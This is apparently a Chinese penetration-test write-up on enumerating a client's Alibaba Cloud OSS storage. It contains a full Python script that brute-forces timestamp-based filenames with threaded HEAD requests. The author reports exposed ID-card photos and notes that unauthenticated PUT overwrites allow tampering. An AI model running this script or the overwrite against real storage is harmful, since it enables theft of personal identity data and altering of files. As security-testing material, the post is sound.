渗透实战 | 阿里云OSS存储桶的遍历

1、OSS爬取脚本编写

这里为啥不直接用oss工具呢？因为这个url是个客户域名后面接附件具体上传时间，刚开始信息搜集到的的阿里云地址并不能通过工具直接遍历附件，所以才简单写了个脚本去遍历。

发现附件规律

附件上传名称为年月日具体时间点，刚开始还以为末尾两个数字为1-99呢写完代码后发现不对，是秒的时间。

现在思路清晰了，来编写代码

这里配置url地址,同时满足pdf、jpg、jpeg、png附件类型

配置时间阶段

发现有效文件输出结果

全部代码

import datetimeimport requestsfrom concurrent.futures import ThreadPoolExecutorfrom requests.exceptions import RequestExceptionfrom threading import Lockimport time# 配置参数BASE_URL = "url地址"SUFFIXES = ['pdf', 'jpg', 'jpeg', 'png']FOUND_FILES = []MAX_WORKERS = 10  # 降低并发数TIMEOUT = 3  # 增加超时时间print_lock = Lock()def generate_time_points():"""时间生成器"""   start = datetime.datetime(2025, 3, 11, 10, 0)   end = datetime.datetime(2025, 3, 12, 9, 0)   delta = datetime.timedelta(minutes=1)   current = startwhile current <= end:       yield f"{current.year}{current.month:02d}{current.day:02d}{current.hour:02d}{current.minute:02d}"       current += deltadef check_file_exists(session, url, retries=3):"""带重试机制的检测"""for attempt in range(retries):       try:           resp = session.head(url, timeout=TIMEOUT, allow_redirects=False)return resp.status_code == 200       except RequestException as e:if attempt == retries - 1:               with print_lock:print(f"[!] 最终失败 {url}: {str(e)[:50]}")           time.sleep(2 ** attempt)return Falsedef worker(args):   session, time_str, num, suffix = args   num_str = f"{num:02d}"   full_code = f"{time_str}{num_str}"   target_url = f"{BASE_URL}{full_code}.{suffix}"if check_file_exists(session, target_url):       with print_lock:print(f"[+] 发现有效文件: {target_url}")return target_urlreturn Noneif __name__ == "__main__":   with requests.Session() as session:       session.trust_env = False  # 关闭自动代理检测       session.headers.update({'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)','Connection': 'keep-alive'       })       with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:for time_str in generate_time_points():               tasks = [(session, time_str, num, suffix)for num in range(1, 61)for suffix in SUFFIXES]for result in executor.map(worker, tasks):if result:                       FOUND_FILES.append(result)print("n扫描完成，发现以下有效文件：")for file in FOUND_FILES:print(file)

OSS文件遍历扫描，在指定时间段排查云存储文件。会每分钟生成240个不同序号（01-60）和格式（PDF/图片）的文件链接，用10个线程同时检查这些文件是否存在。遇到网络问题会自动重试3次，成功找到的文件会实时显示并最终汇总列出，整个过程比手动检查快几十倍，还能避免大量无效流量消耗。

发现大量身份证照片，各种授权信息附带姓名身份证的个人信息等，较敏感就不附图了

2、OSS工具遍历

老生常谈了这里就不详细写用法了，通过bp捕捉到正确的的阿里云OSS流量后直接用工具跑了一遍，将以前时间段的附件给跑出来了。

同时也存在阿里云put上传可覆盖，可达到修改附件内容效果，效果就是篡改~